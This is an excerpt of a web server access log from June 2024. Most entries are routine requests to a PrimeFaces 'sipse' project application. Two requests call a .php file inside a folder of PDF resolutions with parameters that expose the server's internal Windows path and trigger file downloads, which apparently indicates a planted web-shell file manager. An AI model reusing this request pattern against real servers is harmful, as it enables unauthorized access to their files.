186.29.33.66 - - [29/Jun/2024:10:05:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:05:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:05:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:05:25 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:05:25 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3840
186.29.33.66 - - [29/Jun/2024:10:05:26 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3836
186.29.33.66 - - [29/Jun/2024:10:05:28 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 201108
186.29.33.66 - - [29/Jun/2024:10:05:29 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:05:29 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:05:29 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:10:05:29 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.97.35 - - [29/Jun/2024:10:05:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=4218.pdf&ft=download HTTP/1.1" 200 380583
66.249.66.11 - - [29/Jun/2024:10:05:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4232.pdf HTTP/1.1" 200 1221391
186.29.33.66 - - [29/Jun/2024:10:05:40 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/actividad/crearActividad.xhtml HTTP/1.1" 200 2588
186.29.33.66 - - [29/Jun/2024:10:05:42 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/actividad/crearActividad.xhtml HTTP/1.1" 200 2979
186.29.33.66 - - [29/Jun/2024:10:05:49 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/actividad/crearActividad.xhtml HTTP/1.1" 200 87881
47.128.43.96 - - [29/Jun/2024:10:05:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2221.pdf&ft=download HTTP/1.1" 200 405159
